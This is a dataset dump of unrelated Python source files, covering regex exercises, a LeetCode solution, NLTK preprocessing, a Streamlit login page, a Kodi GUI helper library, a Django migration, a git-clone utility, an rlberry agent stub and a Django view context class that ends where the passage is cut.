id (string, 1-265 chars) | text (string, 6-5.19M chars) | dataset_id (7 classes)
---|---|---|
150961 | import re
patterns = ["term1", "term2"]
text = "This is a string with term1, not the other"
split_term = "@"
email = "<EMAIL>"
# for pattern in patterns:
# print("I'm searching for: " + pattern)
#
# if re.search(pattern, text):
# print("MATCH!")
# else:
# print("NO MATCH!")
print(re.split(split_term, email)) # email.split("@")
# print(match.start())
print(re.findall("match", "test phrase match in match middle"))
def multi_re_find(patterns, phrase):
for pat in patterns:
print("Searching for pattern {}".format(pat))
print(re.findall(pat, phrase))
print("\n")
# test_phrase = "sdsd..sssddd..sdddsddd...dsds...dssssss...sddddd"
# test_patterns = ["s[sd]+"]
# test_phrase = "This is a string! But it has punctuation. How can we remove it?"
# test_patterns = ["[^!.?]+"]
# test_patterns = ["[A-Z]+"]
test_phrase = "This is a string with numbers 12312 and a symbol #hashtag"
# \d - digits
# \D - non-digits
# \s - whitespace
# \S - non-whitespace
# \w - alphanumeric (word) characters
# \W - non-alphanumeric characters
test_patterns = [r"\W+"]
multi_re_find(test_patterns, test_phrase)
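# For reference (added note, not part of the original output): with the \W+ pattern above,
# re.findall returns the runs of non-alphanumeric characters in test_phrase, i.e. the single
# spaces between words plus the " #" before "hashtag".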
| StarcoderdataPython |
3285420 | class Solution:
def judgeCircle(self, moves: str) -> bool:
U, D, L, R = moves.count('U'), moves.count('D'), moves.count('L'), moves.count('R')
if U == D and L == R:
return True
else:
return False
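# Illustrative usage (added for clarity): the robot returns to the origin only if opposite
# moves cancel out.
# Solution().judgeCircle("UDLR") -> True  (U==D and L==R)
# Solution().judgeCircle("UUDL") -> False (more U than D)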
| StarcoderdataPython |
3237865 | <filename>lingofunk_classify_sentiment/model/naive_bayes/preprocess.py
import itertools
import re
from nltk.collocations import BigramCollocationFinder
from nltk.corpus import stopwords
from nltk.metrics import BigramAssocMeasures
from nltk.tokenize import word_tokenize
def tokenize(text):
"""Splits a text to words, separates by space and punctuation,
converts to lowercase."""
return map(lambda token: token.lower(), re.findall(r"[\w']+|[.,!?;-]", text))
def remove_stopwords_and_include_bigrams(
text, score_fn=BigramAssocMeasures.chi_sq, n_bigrams=500
):
stopset = set(stopwords.words("english"))
words = [word for word in tokenize(text) if word not in stopset]
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n_bigrams)
return dict([(ngram, True) for ngram in itertools.chain(words, bigrams)])
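# Illustrative usage (added sketch; assumes the NLTK "stopwords" corpus has been downloaded):
# feats = remove_stopwords_and_include_bigrams("The movie was not good, it was great!")
# "feats" maps each kept unigram and each top-scoring bigram tuple to True, the feature-dict
# format expected by nltk's NaiveBayesClassifier.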
| StarcoderdataPython |
89772 | <gh_stars>0
#
# Copyright (C) Analytics Engines 2021
# <NAME> (<EMAIL>)
#
import pandas as pd
import streamlit as st
st.set_page_config(layout="wide")
import requests
import streamlit_bd_cytoscapejs
from common import login,init_state,base_url,format_request,local_css
init_state(['jwt','login_request'])
local_css("colorful.css")
st.markdown("""
# Login
""")
user_name = st.text_input('Username','<EMAIL>')
password = st.text_input('Password','<PASSWORD>!',type='password')
jwt_output = st.empty()
st.button('Click To Login',on_click=lambda: login(user_name,password))
st.write("Login HTTP Request will appear below on click")
st.markdown(st.session_state.login_request,unsafe_allow_html=True)
st.write({"jwt" : st.session_state.jwt}) | StarcoderdataPython |
1700020 | import sys
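# Added descriptive comment: for every line of the file given as the first CLI argument,
# print the second-to-last whitespace-separated token.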
with open(sys.argv[1]) as input_file:
for problem in input_file.readlines():
print(problem.strip().split(' ')[-2])
| StarcoderdataPython |
3286564 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import xbmc
import xbmcgui
import time
import threading
import traceback
MONITOR = None
class BaseFunctions:
xmlFile = ''
path = ''
theme = ''
res = '720p'
width = 1280
height = 720
usesGenerate = False
def __init__(self):
self.isOpen = True
def onWindowFocus(self):
# Not automatically called. Can be used by an external window manager
pass
def onClosed(self):
pass
@classmethod
def open(cls, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
window.modal()
return window
@classmethod
def create(cls, show=True, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
if show:
window.show()
window.isOpen = True
return window
def modal(self):
self.isOpen = True
self.doModal()
self.onClosed()
self.isOpen = False
def activate(self):
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
xbmc.executebuiltin('ReplaceWindow({0})'.format(self._winID))
def mouseXTrans(self, val):
return int((val / self.getWidth()) * self.width)
def mouseYTrans(self, val):
return int((val / self.getHeight()) * self.height)
def closing(self):
return self._closing
@classmethod
def generate(self):
return None
def setProperties(self, prop_list, val_list_or_val):
if isinstance(val_list_or_val, list) or isinstance(val_list_or_val, tuple):
val_list = val_list_or_val
else:
val_list = [val_list_or_val] * len(prop_list)
for prop, val in zip(prop_list, val_list):
self.setProperty(prop, val)
def propertyContext(self, prop, val='1'):
return WindowProperty(self, prop, val)
def setBoolProperty(self, key, boolean):
self.setProperty(key, boolean and '1' or '')
class BaseWindow(xbmcgui.WindowXML, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = None
self.started = False
self.finishedInit = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
self.finishedInit = True
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXML.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseWindow.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
if not self.isOpen:
return
self._closing = True
self.isOpen = False
self.close()
def show(self):
self._closing = False
self.isOpen = True
xbmcgui.WindowXML.show(self)
def onClosed(self):
pass
class BaseDialog(xbmcgui.WindowXMLDialog, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = ''
self.started = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowDialogId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXMLDialog.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseDialog.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
self._closing = True
self.close()
def show(self):
self._closing = False
xbmcgui.WindowXMLDialog.show(self)
def onClosed(self):
pass
class ControlledBase:
def doModal(self):
self.show()
self.wait()
def wait(self):
while not self._closing and not MONITOR.waitForAbort(0.1):
pass
def close(self):
self._closing = True
class ControlledWindow(ControlledBase, BaseWindow):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseWindow.onAction(self, action)
class ControlledDialog(ControlledBase, BaseDialog):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseDialog.onAction(self, action)
DUMMY_LIST_ITEM = xbmcgui.ListItem()
class ManagedListItem(object):
def __init__(self, label='', label2='', iconImage='', thumbnailImage='', path='', data_source=None, properties=None):
self._listItem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, path)
self.dataSource = data_source
self.properties = {}
self.label = label
self.label2 = label2
self.iconImage = iconImage
self.thumbnailImage = thumbnailImage
self.path = path
self._ID = None
self._manager = None
self._valid = True
if properties:
for k, v in properties.items():
self.setProperty(k, v)
def __nonzero__(self):
return self._valid
@property
def listItem(self):
if not self._listItem:
if not self._manager:
return None
try:
self._listItem = self._manager.getListItemFromManagedItem(self)
except RuntimeError:
return None
return self._listItem
def invalidate(self):
self._valid = False
self._listItem = DUMMY_LIST_ITEM
def _takeListItem(self, manager, lid):
self._manager = manager
self._ID = lid
self._listItem.setProperty('__ID__', lid)
li = self._listItem
self._listItem = None
self._manager._properties.update(self.properties)
return li
def _updateListItem(self):
self.listItem.setProperty('__ID__', self._ID)
self.listItem.setLabel(self.label)
self.listItem.setLabel2(self.label2)
self.listItem.setIconImage(self.iconImage)
self.listItem.setThumbnailImage(self.thumbnailImage)
self.listItem.setPath(self.path)
for k in self._manager._properties.keys():
self.listItem.setProperty(k, self.properties.get(k) or '')
def clear(self):
self.label = ''
self.label2 = ''
self.iconImage = ''
self.thumbnailImage = ''
self.path = ''
for k in self.properties:
self.properties[k] = ''
self._updateListItem()
def pos(self):
if not self._manager:
return None
return self._manager.getManagedItemPosition(self)
def addContextMenuItems(self, items, replaceItems=False):
self.listItem.addContextMenuItems(items, replaceItems)
def addStreamInfo(self, stype, values):
self.listItem.addStreamInfo(stype, values)
def getLabel(self):
return self.label
def getLabel2(self):
return self.label2
def getProperty(self, key):
return self.properties.get(key, '')
def getdescription(self):
return self.listItem.getdescription()
def getduration(self):
return self.listItem.getduration()
def getfilename(self):
return self.listItem.getfilename()
def isSelected(self):
return self.listItem.isSelected()
def select(self, selected):
return self.listItem.select(selected)
def setArt(self, values):
return self.listItem.setArt(values)
def setIconImage(self, icon):
self.iconImage = icon
return self.listItem.setIconImage(icon)
def setInfo(self, itype, infoLabels):
return self.listItem.setInfo(itype, infoLabels)
def setLabel(self, label):
self.label = label
return self.listItem.setLabel(label)
def setLabel2(self, label):
self.label2 = label
return self.listItem.setLabel2(label)
def setMimeType(self, mimetype):
return self.listItem.setMimeType(mimetype)
def setPath(self, path):
self.path = path
return self.listItem.setPath(path)
def setProperty(self, key, value):
if self._manager:
self._manager._properties[key] = 1
self.properties[key] = value
self.listItem.setProperty(key, value)
return self
def setBoolProperty(self, key, boolean):
return self.setProperty(key, boolean and '1' or '')
def setSubtitles(self, subtitles):
return self.listItem.setSubtitles(subtitles) # List of strings - HELIX
def setThumbnailImage(self, thumb):
self.thumbnailImage = thumb
return self.listItem.setThumbnailImage(thumb)
def onDestroy(self):
pass
class ManagedControlList(object):
def __init__(self, window, control_id, max_view_index, data_source=None):
self.controlID = control_id
self.control = window.getControl(control_id)
self.items = []
self._sortKey = None
self._idCounter = 0
self._maxViewIndex = max_view_index
self._properties = {}
self.dataSource = data_source
def __getattr__(self, name):
return getattr(self.control, name)
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.items[idx]
else:
return self.getListItem(idx)
def __iter__(self):
for i in self.items:
yield i
def __len__(self):
return self.size()
def _updateItems(self, bottom=None, top=None):
if bottom is None:
bottom = 0
top = self.size()
try:
for idx in range(bottom, top):
li = self.control.getListItem(idx)
mli = self.items[idx]
self._properties.update(mli.properties)
mli._manager = self
mli._listItem = li
mli._updateListItem()
except RuntimeError:
xbmc.log('kodigui.ManagedControlList._updateItems: Runtime error', xbmc.LOGNOTICE)
return False
return True
def _nextID(self):
self._idCounter += 1
return str(self._idCounter)
def reInit(self, window, control_id):
self.controlID = control_id
self.control = window.getControl(control_id)
self.control.addItems([i._takeListItem(self, self._nextID()) for i in self.items])
def setSort(self, sort):
self._sortKey = sort
def addItem(self, managed_item):
self.items.append(managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
def addItems(self, managed_items):
self.items += managed_items
self.control.addItems([i._takeListItem(self, self._nextID()) for i in managed_items])
def replaceItem(self, pos, mli):
self[pos].onDestroy()
self[pos].invalidate()
self.items[pos] = mli
li = self.control.getListItem(pos)
mli._manager = self
mli._listItem = li
mli._updateListItem()
def replaceItems(self, managed_items):
if not self.items:
self.addItems(managed_items)
return True
oldSize = self.size()
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = managed_items
size = self.size()
if size != oldSize:
pos = self.getSelectedPosition()
if size > oldSize:
for i in range(0, size - oldSize):
self.control.addItem(xbmcgui.ListItem())
elif size < oldSize:
diff = oldSize - size
idx = oldSize - 1
while diff:
self.control.removeItem(idx)
idx -= 1
diff -= 1
if self.positionIsValid(pos):
self.selectItem(pos)
elif pos >= size:
self.selectItem(size - 1)
self._updateItems(0, self.size())
def getListItem(self, pos):
li = self.control.getListItem(pos)
mli = self.items[pos]
mli._listItem = li
return mli
def getListItemByDataSource(self, data_source):
for mli in self:
if data_source == mli.dataSource:
return mli
return None
def getSelectedItem(self):
pos = self.control.getSelectedPosition()
if not self.positionIsValid(pos):
pos = self.size() - 1
if pos < 0:
return None
return self.getListItem(pos)
def removeItem(self, index):
old = self.items.pop(index)
old.onDestroy()
old.invalidate()
self.control.removeItem(index)
top = self.control.size() - 1
if top < 0:
return
if top < index:
index = top
self.control.selectItem(index)
def removeManagedItem(self, mli):
self.removeItem(mli.pos())
def insertItem(self, index, managed_item):
pos = self.getSelectedPosition() + 1
if index >= self.size() or index < 0:
self.addItem(managed_item)
else:
self.items.insert(index, managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
self._updateItems(index, self.size())
if self.positionIsValid(pos):
self.selectItem(pos)
def moveItem(self, mli, dest_idx):
source_idx = mli.pos()
if source_idx < dest_idx:
rstart = source_idx
rend = dest_idx + 1
# dest_idx-=1
else:
rstart = dest_idx
rend = source_idx + 1
mli = self.items.pop(source_idx)
self.items.insert(dest_idx, mli)
self._updateItems(rstart, rend)
def swapItems(self, pos1, pos2):
if not self.positionIsValid(pos1) or not self.positionIsValid(pos2):
return False
item1 = self.items[pos1]
item2 = self.items[pos2]
li1 = item1._listItem
li2 = item2._listItem
item1._listItem = li2
item2._listItem = li1
item1._updateListItem()
item2._updateListItem()
self.items[pos1] = item2
self.items[pos2] = item1
return True
def shiftView(self, shift, hold_selected=False):
if not self._maxViewIndex:
return
selected = self.getSelectedItem()
selectedPos = selected.pos()
viewPos = self.getViewPosition()
if shift > 0:
pushPos = selectedPos + (self._maxViewIndex - viewPos) + shift
if pushPos >= self.size():
pushPos = self.size() - 1
self.selectItem(pushPos)
newViewPos = self._maxViewIndex
elif shift < 0:
pushPos = (selectedPos - viewPos) + shift
if pushPos < 0:
pushPos = 0
self.selectItem(pushPos)
newViewPos = 0
if hold_selected:
self.selectItem(selected.pos())
else:
diff = newViewPos - viewPos
fix = pushPos - diff
# print '{0} {1} {2}'.format(newViewPos, viewPos, fix)
if self.positionIsValid(fix):
self.selectItem(fix)
def reset(self):
self.dataSource = None
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = []
self.control.reset()
def size(self):
return len(self.items)
def getViewPosition(self):
try:
return int(xbmc.getInfoLabel('Container({0}).Position'.format(self.controlID)))
except:
return 0
def getViewRange(self):
viewPosition = self.getViewPosition()
selected = self.getSelectedPosition()
return range(max(selected - viewPosition, 0), min(selected + (self._maxViewIndex - viewPosition) + 1, self.size() - 1))
def positionIsValid(self, pos):
return 0 <= pos < self.size()
def sort(self, sort=None, reverse=False):
sort = sort or self._sortKey
self.items.sort(key=sort, reverse=reverse)
self._updateItems(0, self.size())
def reverse(self):
self.items.reverse()
self._updateItems(0, self.size())
def getManagedItemPosition(self, mli):
return self.items.index(mli)
def getListItemFromManagedItem(self, mli):
pos = self.items.index(mli)
return self.control.getListItem(pos)
def topHasFocus(self):
return self.getSelectedPosition() == 0
def bottomHasFocus(self):
return self.getSelectedPosition() == self.size() - 1
def invalidate(self):
for item in self.items:
item._listItem = DUMMY_LIST_ITEM
def newControl(self, window=None, control_id=None):
self.controlID = control_id or self.controlID
self.control = window.getControl(self.controlID)
self.control.addItems([xbmcgui.ListItem() for i in range(self.size())])
self._updateItems()
class _MWBackground(ControlledWindow):
def __init__(self, *args, **kwargs):
self._multiWindow = kwargs.get('multi_window')
self.started = False
BaseWindow.__init__(self, *args, **kwargs)
def onInit(self):
if self.started:
return
self.started = True
self._multiWindow._open()
self.close()
class MultiWindow(object):
def __init__(self, windows=None, default_window=None, **kwargs):
self._windows = windows
self._next = default_window or self._windows[0]
self._properties = {}
self._current = None
self._allClosed = False
self.exitCommand = None
def __getattr__(self, name):
return getattr(self._current, name)
def setWindows(self, windows):
self._windows = windows
def setDefault(self, default):
self._next = default or self._windows[0]
def windowIndex(self, window):
if hasattr(window, 'MULTI_WINDOW_ID'):
for i, w in enumerate(self._windows):
if window.MULTI_WINDOW_ID == w.MULTI_WINDOW_ID:
return i
return 0
else:
return self._windows.index(window.__class__)
def nextWindow(self, window=None):
if window is False:
window = self._windows[self.windowIndex(self._current)]
if window:
if window.__class__ == self._current.__class__:
return None
else:
idx = self.windowIndex(self._current)
idx += 1
if idx >= len(self._windows):
idx = 0
window = self._windows[idx]
self._next = window
self._current.doClose()
return self._next
def _setupCurrent(self, cls):
self._current = cls(cls.xmlFile, cls.path, cls.theme, cls.res)
self._current.onFirstInit = self._onFirstInit
self._current.onReInit = self.onReInit
self._current.onClick = self.onClick
self._current.onFocus = self.onFocus
self._currentOnAction = self._current.onAction
self._current.onAction = self.onAction
@classmethod
def open(cls, **kwargs):
mw = cls(**kwargs)
b = _MWBackground(mw.bgXML, mw.path, mw.theme, mw.res, multi_window=mw)
b.modal()
del b
import gc
gc.collect(2)
return mw
def _open(self):
while not xbmc.abortRequested and not self._allClosed:
self._setupCurrent(self._next)
self._current.modal()
self._current.doClose()
del self._current
del self._next
del self._currentOnAction
def setProperty(self, key, value):
self._properties[key] = value
self._current.setProperty(key, value)
def _onFirstInit(self):
for k, v in self._properties.items():
self._current.setProperty(k, v)
self.onFirstInit()
def doClose(self):
self._allClosed = True
self._current.doClose()
def onFirstInit(self):
pass
def onReInit(self):
pass
def onAction(self, action):
if action == xbmcgui.ACTION_PREVIOUS_MENU or action == xbmcgui.ACTION_NAV_BACK:
self.doClose()
self._currentOnAction(action)
def onClick(self, controlID):
pass
def onFocus(self, controlID):
pass
class SafeControlEdit(object):
CHARS_LOWER = 'abcdefghijklmnopqrstuvwxyz'
CHARS_UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
CHARS_NUMBERS = '0123456789'
CURSOR = '[COLOR FFCC7B19]|[/COLOR]'
def __init__(self, control_id, label_id, window, key_callback=None, grab_focus=False):
self.controlID = control_id
self.labelID = label_id
self._win = window
self._keyCallback = key_callback
self.grabFocus = grab_focus
self._text = ''
self._compatibleMode = False
self.setup()
def setup(self):
self._labelControl = self._win.getControl(self.labelID)
self._winOnAction = self._win.onAction
self._win.onAction = self.onAction
self.updateLabel()
def setCompatibleMode(self, on):
self._compatibleMode = on
def onAction(self, action):
try:
controlID = self._win.getFocusId()
if controlID == self.controlID:
if self.processAction(action.getId()):
return
elif self.grabFocus:
if self.processOffControlAction(action.getButtonCode()):
self._win.setFocusId(self.controlID)
return
except:
traceback.print_exc()
self._winOnAction(action)
def processAction(self, action_id):
if not self._compatibleMode:
self._text = self._win.getControl(self.controlID).getText()
if self._keyCallback:
self._keyCallback()
self.updateLabel()
return True
if 61793 <= action_id <= 61818: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61793])
elif 61761 <= action_id <= 61786: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 61761])
elif 61744 <= action_id <= 61753:
self.processChar(self.CHARS_NUMBERS[action_id - 61744])
elif action_id == 61728: # Space
self.processChar(' ')
elif action_id == 61448:
self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def processOffControlAction(self, action_id):
if 61505 <= action_id <= 61530: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61505])
elif 192577 <= action_id <= 192602: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 192577])
elif 61488 <= action_id <= 61497:
self.processChar(self.CHARS_NUMBERS[action_id - 61488])
elif 61552 <= action_id <= 61561:
self.processChar(self.CHARS_NUMBERS[action_id - 61552])
elif action_id == 61472: # Space
self.processChar(' ')
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def _setText(self, text):
self._text = text
if not self._compatibleMode:
self._win.getControl(self.controlID).setText(text)
self.updateLabel()
def _getText(self):
if not self._compatibleMode and self._win.getFocusId() == self.controlID:
return self._win.getControl(self.controlID).getText()
else:
return self._text
def updateLabel(self):
self._labelControl.setLabel(self._getText() + self.CURSOR)
def processChar(self, char):
self._setText(self.getText() + char)
def setText(self, text):
self._setText(text)
def getText(self):
return self._getText()
def append(self, text):
self._setText(self.getText() + text)
def delete(self):
self._setText(self.getText()[:-1])
class PropertyTimer():
def __init__(self, window_id, timeout, property_, value='', init_value='1', addon_id=None, callback=None):
self._winID = window_id
self._timeout = timeout
self._property = property_
self._value = value
self._initValue = init_value
self._endTime = 0
self._thread = None
self._addonID = addon_id
self._closeWin = None
self._closed = False
self._callback = callback
def _onTimeout(self):
self._endTime = 0
xbmcgui.Window(self._winID).setProperty(self._property, self._value)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), self._value)
if self._closeWin:
self._closeWin.doClose()
if self._callback:
self._callback()
def _wait(self):
while not xbmc.abortRequested and time.time() < self._endTime:
xbmc.sleep(100)
if xbmc.abortRequested:
return
if self._endTime == 0:
return
self._onTimeout()
def _stopped(self):
return not self._thread or not self._thread.isAlive()
def _reset(self):
self._endTime = time.time() + self._timeout
def _start(self):
self.init(self._initValue)
self._thread = threading.Thread(target=self._wait)
self._thread.start()
def stop(self, trigger=False):
self._endTime = trigger and 1 or 0
if not self._stopped():
self._thread.join()
def close(self):
self._closed = True
self.stop()
def init(self, val):
if val is False:
return
elif val is None:
val = self._initValue
xbmcgui.Window(self._winID).setProperty(self._property, val)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), val)
def reset(self, close_win=None, init=None):
self.init(init)
if self._closed:
return
if not self._timeout:
return
self._closeWin = close_win
self._reset()
if self._stopped():
self._start()
class WindowProperty():
def __init__(self, win, prop, val='1', end=None):
self.win = win
self.prop = prop
self.val = val
self.end = end
self.old = self.win.getProperty(self.prop)
def __enter__(self):
self.win.setProperty(self.prop, self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.win.setProperty(self.prop, self.end or self.old)
class GlobalProperty():
def __init__(self, prop, val='1', end=None):
import xbmcaddon
self._addonID = xbmcaddon.Addon().getAddonInfo('id')
self.prop = prop
self.val = val
self.end = end
self.old = xbmc.getInfoLabel('Window(10000).Property({0}.{1})'.format(self._addonID, prop))
def __enter__(self):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.end or self.old)
| StarcoderdataPython |
1661271 | # Generated by Django 2.1.2 on 2018-10-20 11:56
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('incidentes', '0003_auto_20181020_0817'),
]
operations = [
migrations.RenameField(
model_name='ticket',
old_name='grupo',
new_name='grupo_destino',
),
migrations.AlterField(
model_name='ticket',
name='equipo',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='incidentes.Equipos'),
),
migrations.RemoveField(
model_name='usuario',
name='grupo',
),
migrations.AddField(
model_name='usuario',
name='grupo',
field=models.ManyToManyField(to='incidentes.Grupo'),
),
]
| StarcoderdataPython |
109783 | <filename>codebase_analizer/project.py
import os
import shutil
import tempfile
from contextlib import contextmanager
# Python 2/3 compatibility
from builtins import object
class Project(object):
def __init__(self, project_location):
self._project_location = project_location
self._tmpdir = tempfile.gettempdir()
@property
def should_be_clonned(self):
return self._project_location.startswith('http')
@property
def name(self):
project_name = self._project_location.split('/')[-1]
if self.should_be_clonned:
# Truncate .git postfix
project_name = project_name.split('.git')[0]
return project_name
@property
def path(self):
if self.should_be_clonned:
# Return path where projects are cloned
return os.path.join(self._tmpdir, self.name)
return self._project_location
@contextmanager
def open(self):
"""Open project and return its path.
Clone the project if needed but clean after yourself.
"""
if self.should_be_clonned:
self._clone()
yield self.path
# Remove the cloned project -
# the user should not end up with folders they don't know about.
self._remove()
else:
yield self.path
def _clone(self):
assert self.should_be_clonned
os.system('git clone {repo_url} {directory}'.format(
repo_url=self._project_location,
directory=self.path
))
def _remove(self):
shutil.rmtree(self.path)
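# Illustrative usage (added sketch; the URL and the analysis step are hypothetical):
# project = Project('https://github.com/user/repo.git')
# print(project.name)  # -> "repo"
# with project.open() as path:
#     ...  # walk "path" and analyze the codebase; the clone is removed on exit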
| StarcoderdataPython |
1651950 | <reponame>antoine-moulin/rlberry
import logging
import gym.spaces as spaces
import numpy as np
from rlberry.agents import IncrementalAgent
from rlberry.agents.adaptiveql.tree import MDPTreePartition
from rlberry.utils.writers import PeriodicWriter
logger = logging.getLogger(__name__)
class AdaMBAgent(IncrementalAgent):
"""
Model-Based Reinforcement Learning with Adaptive Partitioning [1]_
.. warning::
TO BE IMPLEMENTED, initially for environments with continuous (Box) states
and **discrete actions**.
Parameters
----------
env : gym.Env
Environment with discrete states and actions.
n_episodes : int
Number of episodes
gamma : double, default: 1.0
Discount factor in [0, 1].
horizon : int
Horizon of the objective function.
bonus_scale_factor : double, default: 1.0
Constant by which to multiply the exploration bonus, controls
the level of exploration.
bonus_type : {"simplified_bernstein"}
Type of exploration bonus. Currently, only "simplified_bernstein"
is implemented.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2020).
Adaptive Discretization for Model-Based Reinforcement Learning.
arXiv preprint arXiv:2007.00717.
Notes
------
Uses the metric induced by the l-infinity norm.
"""
name = 'AdaMBAgent'
def __init__(self,
env,
n_episodes=1000,
gamma=1.0,
horizon=50,
bonus_scale_factor=1.0,
bonus_type="simplified_bernstein",
**kwargs):
IncrementalAgent.__init__(self, env, **kwargs)
assert isinstance(self.env.observation_space, spaces.Box)
assert isinstance(self.env.action_space, spaces.Discrete)
self.n_episodes = n_episodes
self.gamma = gamma
self.horizon = horizon
self.bonus_scale_factor = bonus_scale_factor
self.bonus_type = bonus_type
# maximum value
r_range = self.env.reward_range[1] - self.env.reward_range[0]
if r_range == np.inf or r_range == 0.0:
logger.warning("{}: Reward range is zero or infinity. ".format(self.name)
+ "Setting it to 1.")
r_range = 1.0
self.v_max = np.zeros(self.horizon)
self.v_max[-1] = r_range
for hh in reversed(range(self.horizon-1)):
self.v_max[hh] = r_range + self.gamma*self.v_max[hh+1]
self.reset()
def reset(self):
# stores Q function and MDP model.
self.model = MDPTreePartition(self.env.observation_space,
self.env.action_space,
self.horizon)
# info
self._rewards = np.zeros(self.n_episodes)
self.episode = 0
# default writer
self.writer = PeriodicWriter(self.name,
log_every=5*logger.getEffectiveLevel())
def policy(self, observation, hh=0, **kwargs):
return 0
def _update(self, node, state, action, next_state, reward, hh):
pass
def _compute_bonus(self, n, hh):
if self.bonus_type == "simplified_bernstein":
bonus = self.bonus_scale_factor * np.sqrt(1.0 / n) + self.v_max[hh] / n
bonus = min(bonus, self.v_max[hh])
return bonus
else:
raise ValueError(
"Error: bonus type {} not implemented".format(self.bonus_type))
def _run_episode(self):
# interact for H steps
episode_rewards = 0
state = self.env.reset()
for hh in range(self.horizon):
action = 0 # TODO
next_state, reward, done, _ = self.env.step(action)
episode_rewards += reward
# self._update(node, state, action, next_state, reward, hh)
state = next_state
if done:
break
# update info
ep = self.episode
self._rewards[ep] = episode_rewards
self.episode += 1
# writer
if self.writer is not None:
self.writer.add_scalar("ep reward", episode_rewards, self.episode)
# return sum of rewards collected in the episode
return episode_rewards
def partial_fit(self, fraction, **kwargs):
assert 0.0 < fraction <= 1.0
n_episodes_to_run = int(np.ceil(fraction*self.n_episodes))
count = 0
while count < n_episodes_to_run and self.episode < self.n_episodes:
self._run_episode()
count += 1
info = {"n_episodes": self.episode,
"episode_rewards": self._rewards[:self.episode]}
return info
if __name__ == '__main__':
from rlberry.envs.benchmarks.ball_exploration.ball2d import get_benchmark_env
env = get_benchmark_env(level=2)
agent = AdaMBAgent(env, n_episodes=50, horizon=30)
agent.fit()
agent.policy(env.observation_space.sample())
| StarcoderdataPython |
16977 | import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
